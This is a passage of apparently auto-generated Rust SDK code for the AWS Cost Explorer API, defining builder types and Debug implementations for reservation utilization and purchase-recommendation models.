        pub fn set_net_ri_savings(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.net_ri_savings = input;
            self
        }
        /// <p>How much you might save if you use your entire reservation.</p>
        pub fn total_potential_ri_savings(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_potential_ri_savings = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the total potential reservation savings.
        pub fn set_total_potential_ri_savings(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_potential_ri_savings = input;
            self
        }
        /// <p>The upfront cost of your reservation. It's amortized over the reservation
        /// period.</p>
        pub fn amortized_upfront_fee(mut self, input: impl Into<std::string::String>) -> Self {
            self.amortized_upfront_fee = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the amortized upfront fee.
        pub fn set_amortized_upfront_fee(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.amortized_upfront_fee = input;
            self
        }
        /// <p>The monthly cost of your reservation. It's amortized over the reservation
        /// period.</p>
        pub fn amortized_recurring_fee(mut self, input: impl Into<std::string::String>) -> Self {
            self.amortized_recurring_fee = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the amortized recurring fee.
        pub fn set_amortized_recurring_fee(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.amortized_recurring_fee = input;
            self
        }
        /// <p>The total cost of your reservation. It's amortized over the reservation period.</p>
        pub fn total_amortized_fee(mut self, input: impl Into<std::string::String>) -> Self {
            self.total_amortized_fee = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the total amortized fee.
        pub fn set_total_amortized_fee(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_amortized_fee = input;
            self
        }
        /// <p>The cost of unused hours for your reservation.</p>
        pub fn ri_cost_for_unused_hours(mut self, input: impl Into<std::string::String>) -> Self {
            self.ri_cost_for_unused_hours = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the reservation cost of the unused hours.
        pub fn set_ri_cost_for_unused_hours(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.ri_cost_for_unused_hours = input;
            self
        }
        /// <p>The realized savings because of purchasing and using a reservation.</p>
        pub fn realized_savings(mut self, input: impl Into<std::string::String>) -> Self {
            self.realized_savings = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the realized savings.
        pub fn set_realized_savings(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.realized_savings = input;
            self
        }
        /// <p>The unrealized savings because of purchasing and using a reservation.</p>
        pub fn unrealized_savings(mut self, input: impl Into<std::string::String>) -> Self {
            self.unrealized_savings = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the unrealized savings.
        pub fn set_unrealized_savings(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.unrealized_savings = input;
            self
        }
        /// Consumes the builder and constructs a [`ReservationAggregates`](crate::model::ReservationAggregates)
        pub fn build(self) -> crate::model::ReservationAggregates {
            crate::model::ReservationAggregates {
                utilization_percentage: self.utilization_percentage,
                utilization_percentage_in_units: self.utilization_percentage_in_units,
                purchased_hours: self.purchased_hours,
                purchased_units: self.purchased_units,
                total_actual_hours: self.total_actual_hours,
                total_actual_units: self.total_actual_units,
                unused_hours: self.unused_hours,
                unused_units: self.unused_units,
                on_demand_cost_of_ri_hours_used: self.on_demand_cost_of_ri_hours_used,
                net_ri_savings: self.net_ri_savings,
                total_potential_ri_savings: self.total_potential_ri_savings,
                amortized_upfront_fee: self.amortized_upfront_fee,
                amortized_recurring_fee: self.amortized_recurring_fee,
                total_amortized_fee: self.total_amortized_fee,
                ri_cost_for_unused_hours: self.ri_cost_for_unused_hours,
                realized_savings: self.realized_savings,
                unrealized_savings: self.unrealized_savings,
            }
        }
    }
}
impl ReservationAggregates {
    /// Creates a new builder-style object to manufacture [`ReservationAggregates`](crate::model::ReservationAggregates)
    pub fn builder() -> crate::model::reservation_aggregates::Builder {
        // The builder derives `Default`; let inference pick the concrete type.
        Default::default()
    }
}
/// <p>The amount of utilization, in hours.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct UtilizationByTime {
    /// <p>The period of time that this utilization was used for.</p>
    pub time_period: std::option::Option<crate::model::DateInterval>,
    /// <p>The groups that this utilization result uses.</p>
    pub groups: std::option::Option<std::vec::Vec<crate::model::ReservationUtilizationGroup>>,
    /// <p>The total number of reservation hours that were used.</p>
    pub total: std::option::Option<crate::model::ReservationAggregates>,
}
impl std::fmt::Debug for UtilizationByTime {
    /// Renders every field through a single chained `debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("UtilizationByTime")
            .field("time_period", &self.time_period)
            .field("groups", &self.groups)
            .field("total", &self.total)
            .finish()
    }
}
/// See [`UtilizationByTime`](crate::model::UtilizationByTime)
pub mod utilization_by_time {
    /// A builder for [`UtilizationByTime`](crate::model::UtilizationByTime)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
        pub(crate) groups:
            std::option::Option<std::vec::Vec<crate::model::ReservationUtilizationGroup>>,
        pub(crate) total: std::option::Option<crate::model::ReservationAggregates>,
    }
    impl Builder {
        /// <p>The period of time that this utilization was used for.</p>
        pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
            self.time_period = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the period of time that this utilization was used for.
        pub fn set_time_period(
            mut self,
            input: std::option::Option<crate::model::DateInterval>,
        ) -> Self {
            self.time_period = input;
            self
        }
        /// Appends an item to `groups`, creating the list on first use.
        ///
        /// <p>The groups that this utilization result uses.</p>
        pub fn groups(
            mut self,
            input: impl Into<crate::model::ReservationUtilizationGroup>,
        ) -> Self {
            let mut v = self.groups.unwrap_or_default();
            v.push(input.into());
            self.groups = Some(v);
            self
        }
        /// Replaces (or clears, with `None`) the entire `groups` list.
        pub fn set_groups(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::ReservationUtilizationGroup>>,
        ) -> Self {
            self.groups = input;
            self
        }
        /// <p>The total number of reservation hours that were used.</p>
        pub fn total(mut self, input: crate::model::ReservationAggregates) -> Self {
            self.total = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the total number of reservation hours that were used.
        pub fn set_total(
            mut self,
            input: std::option::Option<crate::model::ReservationAggregates>,
        ) -> Self {
            self.total = input;
            self
        }
        /// Consumes the builder and constructs a [`UtilizationByTime`](crate::model::UtilizationByTime)
        pub fn build(self) -> crate::model::UtilizationByTime {
            crate::model::UtilizationByTime {
                time_period: self.time_period,
                groups: self.groups,
                total: self.total,
            }
        }
    }
}
impl UtilizationByTime {
    /// Creates a new builder-style object to manufacture [`UtilizationByTime`](crate::model::UtilizationByTime)
    pub fn builder() -> crate::model::utilization_by_time::Builder {
        // The builder derives `Default`; let inference pick the concrete type.
        Default::default()
    }
}
/// <p>A group of reservations that share a set of attributes.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationUtilizationGroup {
    /// <p>The key for a specific reservation attribute.</p>
    pub key: std::option::Option<std::string::String>,
    /// <p>The value of a specific reservation attribute.</p>
    pub value: std::option::Option<std::string::String>,
    /// <p>The attributes for this group of reservations.</p>
    pub attributes:
        std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
    /// <p>How much you used this group of reservations.</p>
    pub utilization: std::option::Option<crate::model::ReservationAggregates>,
}
impl std::fmt::Debug for ReservationUtilizationGroup {
    /// Renders every field through a single chained `debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ReservationUtilizationGroup")
            .field("key", &self.key)
            .field("value", &self.value)
            .field("attributes", &self.attributes)
            .field("utilization", &self.utilization)
            .finish()
    }
}
/// See [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
pub mod reservation_utilization_group {
    /// A builder for [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) key: std::option::Option<std::string::String>,
        pub(crate) value: std::option::Option<std::string::String>,
        pub(crate) attributes: std::option::Option<
            std::collections::HashMap<std::string::String, std::string::String>,
        >,
        pub(crate) utilization: std::option::Option<crate::model::ReservationAggregates>,
    }
    impl Builder {
        /// <p>The key for a specific reservation attribute.</p>
        pub fn key(mut self, input: impl Into<std::string::String>) -> Self {
            self.key = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the key for a specific reservation attribute.
        pub fn set_key(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.key = input;
            self
        }
        /// <p>The value of a specific reservation attribute.</p>
        pub fn value(mut self, input: impl Into<std::string::String>) -> Self {
            self.value = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the value of a specific reservation attribute.
        pub fn set_value(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.value = input;
            self
        }
        /// Adds a key-value pair to `attributes`, creating the map on first use.
        ///
        /// <p>The attributes for this group of reservations.</p>
        pub fn attributes(
            mut self,
            k: impl Into<std::string::String>,
            v: impl Into<std::string::String>,
        ) -> Self {
            let mut hash_map = self.attributes.unwrap_or_default();
            hash_map.insert(k.into(), v.into());
            self.attributes = Some(hash_map);
            self
        }
        /// Replaces (or clears, with `None`) the entire `attributes` map.
        pub fn set_attributes(
            mut self,
            input: std::option::Option<
                std::collections::HashMap<std::string::String, std::string::String>,
            >,
        ) -> Self {
            self.attributes = input;
            self
        }
        /// <p>How much you used this group of reservations.</p>
        pub fn utilization(mut self, input: crate::model::ReservationAggregates) -> Self {
            self.utilization = Some(input);
            self
        }
        /// Sets (or clears, with `None`) how much you used this group of reservations.
        pub fn set_utilization(
            mut self,
            input: std::option::Option<crate::model::ReservationAggregates>,
        ) -> Self {
            self.utilization = input;
            self
        }
        /// Consumes the builder and constructs a [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
        pub fn build(self) -> crate::model::ReservationUtilizationGroup {
            crate::model::ReservationUtilizationGroup {
                key: self.key,
                value: self.value,
                attributes: self.attributes,
                utilization: self.utilization,
            }
        }
    }
}
impl ReservationUtilizationGroup {
    /// Creates a new builder-style object to manufacture [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
    pub fn builder() -> crate::model::reservation_utilization_group::Builder {
        // The builder derives `Default`; let inference pick the concrete type.
        Default::default()
    }
}
/// <p>A specific reservation that Amazon Web Services recommends for purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendation {
    /// <p>The account scope that Amazon Web Services recommends that you purchase this instance
    /// for. For example, you can purchase this reservation for an entire organization in
    /// Amazon Web Services Organizations.</p>
    pub account_scope: std::option::Option<crate::model::AccountScope>,
    /// <p>How many days of previous usage that Amazon Web Services considers when making this
    /// recommendation.</p>
    pub lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
    /// <p>The term of the reservation that you want recommendations for, in years.</p>
    pub term_in_years: std::option::Option<crate::model::TermInYears>,
    /// <p>The payment option for the reservation (for example, <code>AllUpfront</code> or
    /// <code>NoUpfront</code>).</p>
    pub payment_option: std::option::Option<crate::model::PaymentOption>,
    /// <p>Hardware specifications for the service that you want recommendations for.</p>
    pub service_specification: std::option::Option<crate::model::ServiceSpecification>,
    /// <p>Details about the recommended purchases.</p>
    pub recommendation_details:
        std::option::Option<std::vec::Vec<crate::model::ReservationPurchaseRecommendationDetail>>,
    /// <p>A summary about the recommended purchase.</p>
    pub recommendation_summary:
        std::option::Option<crate::model::ReservationPurchaseRecommendationSummary>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendation {
    /// Renders every field through a single chained `debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ReservationPurchaseRecommendation")
            .field("account_scope", &self.account_scope)
            .field("lookback_period_in_days", &self.lookback_period_in_days)
            .field("term_in_years", &self.term_in_years)
            .field("payment_option", &self.payment_option)
            .field("service_specification", &self.service_specification)
            .field("recommendation_details", &self.recommendation_details)
            .field("recommendation_summary", &self.recommendation_summary)
            .finish()
    }
}
/// See [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
pub mod reservation_purchase_recommendation {
    /// A builder for [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) account_scope: std::option::Option<crate::model::AccountScope>,
        pub(crate) lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
        pub(crate) term_in_years: std::option::Option<crate::model::TermInYears>,
        pub(crate) payment_option: std::option::Option<crate::model::PaymentOption>,
        pub(crate) service_specification: std::option::Option<crate::model::ServiceSpecification>,
        pub(crate) recommendation_details: std::option::Option<
            std::vec::Vec<crate::model::ReservationPurchaseRecommendationDetail>,
        >,
        pub(crate) recommendation_summary:
            std::option::Option<crate::model::ReservationPurchaseRecommendationSummary>,
    }
    impl Builder {
        /// <p>The account scope that Amazon Web Services recommends that you purchase this instance
        /// for. For example, you can purchase this reservation for an entire organization in
        /// Amazon Web Services Organizations.</p>
        pub fn account_scope(mut self, input: crate::model::AccountScope) -> Self {
            self.account_scope = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the recommended account scope.
        pub fn set_account_scope(
            mut self,
            input: std::option::Option<crate::model::AccountScope>,
        ) -> Self {
            self.account_scope = input;
            self
        }
        /// <p>How many days of previous usage that Amazon Web Services considers when making this
        /// recommendation.</p>
        pub fn lookback_period_in_days(
            mut self,
            input: crate::model::LookbackPeriodInDays,
        ) -> Self {
            self.lookback_period_in_days = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the lookback period used for this recommendation.
        pub fn set_lookback_period_in_days(
            mut self,
            input: std::option::Option<crate::model::LookbackPeriodInDays>,
        ) -> Self {
            self.lookback_period_in_days = input;
            self
        }
        /// <p>The term of the reservation that you want recommendations for, in years.</p>
        pub fn term_in_years(mut self, input: crate::model::TermInYears) -> Self {
            self.term_in_years = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the reservation term, in years.
        pub fn set_term_in_years(
            mut self,
            input: std::option::Option<crate::model::TermInYears>,
        ) -> Self {
            self.term_in_years = input;
            self
        }
        /// <p>The payment option for the reservation (for example, <code>AllUpfront</code> or
        /// <code>NoUpfront</code>).</p>
        pub fn payment_option(mut self, input: crate::model::PaymentOption) -> Self {
            self.payment_option = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the reservation payment option.
        pub fn set_payment_option(
            mut self,
            input: std::option::Option<crate::model::PaymentOption>,
        ) -> Self {
            self.payment_option = input;
            self
        }
        /// <p>Hardware specifications for the service that you want recommendations for.</p>
        pub fn service_specification(mut self, input: crate::model::ServiceSpecification) -> Self {
            self.service_specification = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the hardware specifications for the service.
        pub fn set_service_specification(
            mut self,
            input: std::option::Option<crate::model::ServiceSpecification>,
        ) -> Self {
            self.service_specification = input;
            self
        }
        /// Appends an item to `recommendation_details`, creating the list on first use.
        ///
        /// <p>Details about the recommended purchases.</p>
        pub fn recommendation_details(
            mut self,
            input: impl Into<crate::model::ReservationPurchaseRecommendationDetail>,
        ) -> Self {
            let mut v = self.recommendation_details.unwrap_or_default();
            v.push(input.into());
            self.recommendation_details = Some(v);
            self
        }
        /// Replaces (or clears, with `None`) the entire `recommendation_details` list.
        pub fn set_recommendation_details(
            mut self,
            input: std::option::Option<
                std::vec::Vec<crate::model::ReservationPurchaseRecommendationDetail>,
            >,
        ) -> Self {
            self.recommendation_details = input;
            self
        }
        /// <p>A summary about the recommended purchase.</p>
        pub fn recommendation_summary(
            mut self,
            input: crate::model::ReservationPurchaseRecommendationSummary,
        ) -> Self {
            self.recommendation_summary = Some(input);
            self
        }
        /// Sets (or clears, with `None`) the summary about the recommended purchase.
        pub fn set_recommendation_summary(
            mut self,
            input: std::option::Option<crate::model::ReservationPurchaseRecommendationSummary>,
        ) -> Self {
            self.recommendation_summary = input;
            self
        }
        /// Consumes the builder and constructs a [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
        pub fn build(self) -> crate::model::ReservationPurchaseRecommendation {
            crate::model::ReservationPurchaseRecommendation {
                account_scope: self.account_scope,
                lookback_period_in_days: self.lookback_period_in_days,
                term_in_years: self.term_in_years,
                payment_option: self.payment_option,
                service_specification: self.service_specification,
                recommendation_details: self.recommendation_details,
                recommendation_summary: self.recommendation_summary,
            }
        }
    }
}
impl ReservationPurchaseRecommendation {
    /// Creates a new builder-style object to manufacture [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
    pub fn builder() -> crate::model::reservation_purchase_recommendation::Builder {
        // The builder derives `Default`; let inference pick the concrete type.
        Default::default()
    }
}
/// <p>A summary about this recommendation, such as the currency code, the amount that
/// Amazon Web Services estimates that you could save, and the total amount of
/// reservation to purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendationSummary {
    /// <p>The total amount that Amazon Web Services estimates that this recommendation could save
    /// you in a month.</p>
    pub total_estimated_monthly_savings_amount: std::option::Option<std::string::String>,
    /// <p>The total amount that Amazon Web Services estimates that this recommendation could save
    /// you in a month, as a percentage of your costs.</p>
    pub total_estimated_monthly_savings_percentage: std::option::Option<std::string::String>,
    /// <p>The currency code used for this recommendation.</p>
    pub currency_code: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendationSummary {
    /// Renders every field through a single chained `debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ReservationPurchaseRecommendationSummary")
            .field(
                "total_estimated_monthly_savings_amount",
                &self.total_estimated_monthly_savings_amount,
            )
            .field(
                "total_estimated_monthly_savings_percentage",
                &self.total_estimated_monthly_savings_percentage,
            )
            .field("currency_code", &self.currency_code)
            .finish()
    }
}
/// See [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
pub mod reservation_purchase_recommendation_summary {
    /// A builder for [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) total_estimated_monthly_savings_amount: std::option::Option<std::string::String>,
        pub(crate) total_estimated_monthly_savings_percentage:
            std::option::Option<std::string::String>,
        pub(crate) currency_code: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The total amount that Amazon Web Services estimates that this recommendation could save
        /// you in a month.</p>
        pub fn total_estimated_monthly_savings_amount(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.total_estimated_monthly_savings_amount = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the total estimated monthly savings amount.
        pub fn set_total_estimated_monthly_savings_amount(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_estimated_monthly_savings_amount = input;
            self
        }
        /// <p>The total amount that Amazon Web Services estimates that this recommendation could save
        /// you in a month, as a percentage of your costs.</p>
        pub fn total_estimated_monthly_savings_percentage(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.total_estimated_monthly_savings_percentage = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the total estimated monthly savings percentage.
        pub fn set_total_estimated_monthly_savings_percentage(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.total_estimated_monthly_savings_percentage = input;
            self
        }
        /// <p>The currency code used for this recommendation.</p>
        pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
            self.currency_code = Some(input.into());
            self
        }
        /// Sets (or clears, with `None`) the currency code used for this recommendation.
        pub fn set_currency_code(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.currency_code = input;
            self
        }
        /// Consumes the builder and constructs a [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
        pub fn build(self) -> crate::model::ReservationPurchaseRecommendationSummary {
            crate::model::ReservationPurchaseRecommendationSummary {
                total_estimated_monthly_savings_amount: self.total_estimated_monthly_savings_amount,
                total_estimated_monthly_savings_percentage: self
                    .total_estimated_monthly_savings_percentage,
                currency_code: self.currency_code,
            }
        }
    }
}
impl ReservationPurchaseRecommendationSummary {
    /// Creates a new builder-style object to manufacture [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
    pub fn builder() -> crate::model::reservation_purchase_recommendation_summary::Builder {
        // The builder derives `Default`; let inference pick the concrete type.
        Default::default()
    }
}
/// <p>Details about your recommended reservation purchase.</p>
///
/// NOTE(review): all numeric quantities here are carried as strings (as declared
/// below) — callers should parse them as needed; confirm formats against the
/// Cost Explorer API reference.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendationDetail {
    /// <p>The account that this RI recommendation is for.</p>
    pub account_id: std::option::Option<std::string::String>,
    /// <p>Details about the instances that Amazon Web Services recommends that you
    /// purchase.</p>
    pub instance_details: std::option::Option<crate::model::InstanceDetails>,
    /// <p>The number of instances that Amazon Web Services recommends that you purchase.</p>
    pub recommended_number_of_instances_to_purchase: std::option::Option<std::string::String>,
    /// <p>The number of normalized units that Amazon Web Services recommends that you
    /// purchase.</p>
    pub recommended_normalized_units_to_purchase: std::option::Option<std::string::String>,
    /// <p>The minimum number of instances that you used in an hour during the historical period.
    /// Amazon Web Services uses this to calculate your recommended reservation
    /// purchases.</p>
    pub minimum_number_of_instances_used_per_hour: std::option::Option<std::string::String>,
    /// <p>The minimum number of normalized units that you used in an hour during the historical
    /// period. Amazon Web Services uses this to calculate your recommended reservation
    /// purchases.</p>
    pub minimum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
    /// <p>The maximum number of instances that you used in an hour during the historical period.
    /// Amazon Web Services uses this to calculate your recommended reservation
    /// purchases.</p>
    pub maximum_number_of_instances_used_per_hour: std::option::Option<std::string::String>,
    /// <p>The maximum number of normalized units that you used in an hour during the historical
    /// period. Amazon Web Services uses this to calculate your recommended reservation
    /// purchases.</p>
    pub maximum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
    /// <p>The average number of instances that you used in an hour during the historical period.
    /// Amazon Web Services uses this to calculate your recommended reservation
    /// purchases.</p>
    pub average_number_of_instances_used_per_hour: std::option::Option<std::string::String>,
    /// <p>The average number of normalized units that you used in an hour during the historical
    /// period. Amazon Web Services uses this to calculate your recommended reservation
    /// purchases.</p>
    pub average_normalized_units_used_per_hour: std::option::Option<std::string::String>,
    /// <p>The average utilization of your instances. Amazon Web Services uses this to calculate
    /// your recommended reservation purchases.</p>
    pub average_utilization: std::option::Option<std::string::String>,
    /// <p>How long Amazon Web Services estimates that it takes for this instance to start saving
    /// you money, in months.</p>
    pub estimated_break_even_in_months: std::option::Option<std::string::String>,
    /// <p>The currency code that Amazon Web Services used to calculate the costs for this
    /// instance.</p>
    pub currency_code: std::option::Option<std::string::String>,
    /// <p>How much Amazon Web Services estimates that this specific recommendation could save you
    /// in a month.</p>
    pub estimated_monthly_savings_amount: std::option::Option<std::string::String>,
    /// <p>How much Amazon Web Services estimates that this specific recommendation could save you
    /// in a month, as a percentage of your overall costs.</p>
    pub estimated_monthly_savings_percentage: std::option::Option<std::string::String>,
    /// <p>How much Amazon Web Services estimates that you spend on On-Demand Instances in a
    /// month.</p>
    pub estimated_monthly_on_demand_cost: std::option::Option<std::string::String>,
    /// <p>How much Amazon Web Services estimates that you would have spent for all usage during
    /// the specified historical period if you had a reservation.</p>
    pub estimated_reservation_cost_for_lookback_period: std::option::Option<std::string::String>,
    /// <p>How much purchasing this instance costs you upfront.</p>
    pub upfront_cost: std::option::Option<std::string::String>,
    /// <p>How much purchasing this instance costs you on a monthly basis.</p>
    pub recurring_standard_monthly_cost: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendationDetail {
    /// Renders every field by name via the standard struct-debug helper, in
    /// declaration order, producing output identical to a derived `Debug`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ReservationPurchaseRecommendationDetail")
            .field("account_id", &self.account_id)
            .field("instance_details", &self.instance_details)
            .field(
                "recommended_number_of_instances_to_purchase",
                &self.recommended_number_of_instances_to_purchase,
            )
            .field(
                "recommended_normalized_units_to_purchase",
                &self.recommended_normalized_units_to_purchase,
            )
            .field(
                "minimum_number_of_instances_used_per_hour",
                &self.minimum_number_of_instances_used_per_hour,
            )
            .field(
                "minimum_normalized_units_used_per_hour",
                &self.minimum_normalized_units_used_per_hour,
            )
            .field(
                "maximum_number_of_instances_used_per_hour",
                &self.maximum_number_of_instances_used_per_hour,
            )
            .field(
                "maximum_normalized_units_used_per_hour",
                &self.maximum_normalized_units_used_per_hour,
            )
            .field(
                "average_number_of_instances_used_per_hour",
                &self.average_number_of_instances_used_per_hour,
            )
            .field(
                "average_normalized_units_used_per_hour",
                &self.average_normalized_units_used_per_hour,
            )
            .field("average_utilization", &self.average_utilization)
            .field(
                "estimated_break_even_in_months",
                &self.estimated_break_even_in_months,
            )
            .field("currency_code", &self.currency_code)
            .field(
                "estimated_monthly_savings_amount",
                &self.estimated_monthly_savings_amount,
            )
            .field(
                "estimated_monthly_savings_percentage",
                &self.estimated_monthly_savings_percentage,
            )
            .field(
                "estimated_monthly_on_demand_cost",
                &self.estimated_monthly_on_demand_cost,
            )
            .field(
                "estimated_reservation_cost_for_lookback_period",
                &self.estimated_reservation_cost_for_lookback_period,
            )
            .field("upfront_cost", &self.upfront_cost)
            .field(
                "recurring_standard_monthly_cost",
                &self.recurring_standard_monthly_cost,
            )
            .finish()
    }
}
/// See [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail)
pub mod reservation_purchase_recommendation_detail {
    /// A builder for [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) account_id: std::option::Option<std::string::String>,
        pub(crate) instance_details: std::option::Option<crate::model::InstanceDetails>,
        pub(crate) recommended_number_of_instances_to_purchase:
            std::option::Option<std::string::String>,
        pub(crate) recommended_normalized_units_to_purchase:
            std::option::Option<std::string::String>,
        pub(crate) minimum_number_of_instances_used_per_hour:
            std::option::Option<std::string::String>,
        pub(crate) minimum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
        pub(crate) maximum_number_of_instances_used_per_hour:
            std::option::Option<std::string::String>,
        pub(crate) maximum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
        pub(crate) average_number_of_instances_used_per_hour:
            std::option::Option<std::string::String>,
        pub(crate) average_normalized_units_used_per_hour: std::option::Option<std::string::String>,
        pub(crate) average_utilization: std::option::Option<std::string::String>,
        pub(crate) estimated_break_even_in_months: std::option::Option<std::string::String>,
        pub(crate) currency_code: std::option::Option<std::string::String>,
        pub(crate) estimated_monthly_savings_amount: std::option::Option<std::string::String>,
        pub(crate) estimated_monthly_savings_percentage: std::option::Option<std::string::String>,
        pub(crate) estimated_monthly_on_demand_cost: std::option::Option<std::string::String>,
        pub(crate) estimated_reservation_cost_for_lookback_period:
            std::option::Option<std::string::String>,
        pub(crate) upfront_cost: std::option::Option<std::string::String>,
        pub(crate) recurring_standard_monthly_cost: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The account that this RI recommendation is for.</p>
        pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
            self.account_id = Some(input.into());
            self
        }
        /// Sets the account ID directly from an optional value
        /// (passing `None` clears any previously set value).
        pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.account_id = input;
            self
        }
        /// <p>Details about the instances that Amazon Web Services recommends that you
        /// purchase.</p>
        pub fn instance_details(mut self, input: crate::model::InstanceDetails) -> Self {
            self.instance_details = Some(input);
            self
        }
        /// Sets the instance details directly from an optional value.
        pub fn set_instance_details(
            mut self,
            input: std::option::Option<crate::model::InstanceDetails>,
        ) -> Self {
            self.instance_details = input;
            self
        }
        /// <p>The number of instances that Amazon Web Services recommends that you purchase.</p>
        pub fn recommended_number_of_instances_to_purchase(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.recommended_number_of_instances_to_purchase = Some(input.into());
            self
        }
        /// Sets the recommended number of instances to purchase directly from an optional value.
        pub fn set_recommended_number_of_instances_to_purchase(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.recommended_number_of_instances_to_purchase = input;
            self
        }
        /// <p>The number of normalized units that Amazon Web Services recommends that you
        /// purchase.</p>
        pub fn recommended_normalized_units_to_purchase(
            mut self,
            input: impl Into<std::string::String>,
        ) -> Self {
            self.recommended_normalized_units_to_purchase = Some(input.into());
            self
        }
        /// Sets the recommended normalized units to purchase directly from an optional value.
        pub fn set_recommended_normalized_units_to_purchase(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.recommended_normalized_units_to_purchase = input;
            self
        }
        /// <p>The minimum number of instances that you used in an hour during the historical period.
        /// Amazon Web Services uses this to calculate your recommended reservation
        /// purchases.</p>
        pub fn minimum_number_of_instances_used_per_hour(
            mut self,
